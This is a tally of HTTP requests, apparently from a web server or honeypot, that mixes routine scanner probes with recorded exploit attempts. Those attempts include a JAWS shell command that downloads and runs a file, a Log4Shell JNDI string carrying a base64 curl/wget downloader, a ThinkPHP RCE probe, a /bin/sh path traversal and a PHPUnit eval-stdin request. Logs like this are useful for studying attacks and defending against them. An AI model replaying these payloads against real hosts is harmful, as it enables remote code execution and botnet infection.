1 | GET | /admin/login.jsp |
HTTP/1.1 |
1 | GET | /authenticate/login |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.asp |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.cfm |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.html |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.inc |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.php3 |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.php |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.pl |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.sh |
HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.shtml |
HTTP/1.1 |
1 | GET | /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm |
HTTP/1.1 |
2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /ddem/ |
HTTP/1.1 |
2 | GET | /dispatch.asp |
HTTP/1.1 |
1 | GET | /dms2/Login.jsp |
HTTP/1.1 |
1 | GET | /en/main.js |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /file |
HTTP/1.1 |
2 | GET | /header.php?tab=status |
HTTP/1.1 |
1 | GET | /home.htm |
HTTP/1.1 |
1 | GET | /index.html |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
1 | GET | /intruvert/jsp/admin/Login.jsp |
HTTP/1.1 |
1 | GET | /js/Device.js |
HTTP/1.1 |
1 | GET | /links_en.html |
HTTP/1.1 |
1 | GET | /login.htm |
HTTP/1.1 |
1 | GET | /login.html |
HTTP/1.1 |
1 | GET | /login.php |
HTTP/1.1 |
3 | GET | /login?redirects=10 |
HTTP/1.1 |
1 | GET | /loginMsg.js |
HTTP/1.1 |
2 | GET | /login |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username= |
HTTP/1.1 |
1 | GET | /netmri/config/userAdmin/login.tdf |
HTTP/1.1 |
1 | GET | /properties/configuration.php?tab=Status |
HTTP/1.1 |
1 | GET | /properties/description.dhtml |
HTTP/1.1 |
1 | GET | /ptz.htm |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.asp |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.cfm |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.cgi |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.html |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.inc |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.php3 |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.php |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.pl |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.sh |
HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.shtml |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /scgi-bin/platform.cgi |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.asp |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.cfm |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.cgi |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.html |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.inc |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.php3 |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.php |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.pl |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.sh |
HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.shtml |
HTTP/1.1 |
1 | GET | /server-info |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
3 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json |
HTTP/1.1 |
1 | GET | /start.js |
HTTP/1.1 |
1 | GET | /sws/data/sws_data.js |
HTTP/1.1 |
1 | GET | /this_server/all_settings.shtml |
HTTP/1.1 |
1 | GET | /tmui/ |
HTTP/1.1 |
1 | GET | /upnp/BasicDevice.xml |
HTTP/1.1 |
1 | GET | /wavemaster.internal |
HTTP/1.1 |
1 | GET | /wcd/system.xml |
HTTP/1.1 |
1 | GET | /xmldata?item=All |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.0 |
3 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | VYZMFY | / |
HTTP/1.1 |